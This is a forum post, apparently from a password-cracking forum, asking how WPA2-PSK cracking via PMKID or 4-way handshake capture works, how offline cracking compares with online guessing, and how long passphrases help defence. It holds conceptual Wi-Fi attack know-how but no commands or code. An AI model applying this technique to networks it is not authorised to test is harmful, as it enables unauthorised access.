Understanding EAPOL 4-Way Handshake and PMKID cracking
#1
Hello!

I read how cracking WPA2PSK works and it seems to boil down to either capture the entire 4-way handshake or just the PMKID, if the access point broadcasts it, and then run hashcat. Now, I have a few questions.

#1: Is capturing the PMKID preferable over capturing the entire 4-way handshake? From what I understand, both provide you enough information for cracking the PMK (which is the actual access key if I'm not mistaken) and that means you'll find the PSK (the secret passphrase) once hashcat is finished. The PMKID is much easier to get since it doesn't require any clients to connect to the access point. If in both cases I only need to crack the PMK, does that mean that it takes the same amount of time with both attacks, or is the handshake method slower to crack because I need to feed hashcat more data?

#2: It seems that in the end capturing an handshake or PMKID is just to have a file to let hashcat work on. I mean, one could also stand in front of the access point and try connecting with all possible password combinations but I guess that would take much longer, hence why having a capture file to crack offline is much more convenient. Is this correct?

#3: If an access point doesn't broadcast the PMKID, a 4-way handshake attack is always viable unless the access point is using enterprise security protocols, right? Also, I suppose that to improve my defense against this type of attack, using a complex long passphrase helps a lot.

Please, correct me if I'm wrong. Thanks in advance!
Reply


Messages In This Thread
Understanding EAPOL 4-Way Handshake and PMKID cracking - by kiwil3mon - 03-31-2020, 02:37 AM